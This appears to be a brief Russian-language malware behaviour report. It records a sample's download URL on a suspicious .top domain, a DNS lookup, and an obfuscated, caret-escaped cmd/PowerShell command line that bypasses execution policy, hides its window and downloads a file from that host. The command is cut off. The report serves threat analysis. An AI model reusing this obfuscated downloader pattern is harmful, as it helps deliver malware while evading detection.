Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWers^hel^L.^EXe ^-^ExEcUTi^oNPO^liCY b^y^PaSS^ -No^p^roFIlE ^-wiND^ow^s^TYle Hid^d^eN ^(n^E^w-OBJECT^ s^YSte^M.N^ET^.w^eb^C^l^ieN^T).d^oWNL^OA^d^fiL^e('http://www.zoerpoled....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "P^OWers^hel^L.^EXe ^-^ExEcUTi^oNPO^liCY b^y^PaSS^ -No^p^roFIlE ^-wiND^ow^s^TYle Hid^d^eN ^(n^E^w-OBJECT^ s^YSte^M.N^ET^.w^eb^C^l^ieN^T).d^oWNL^OA^d^fiL^e('http://www.zoerpoled....' (со скрытым окном)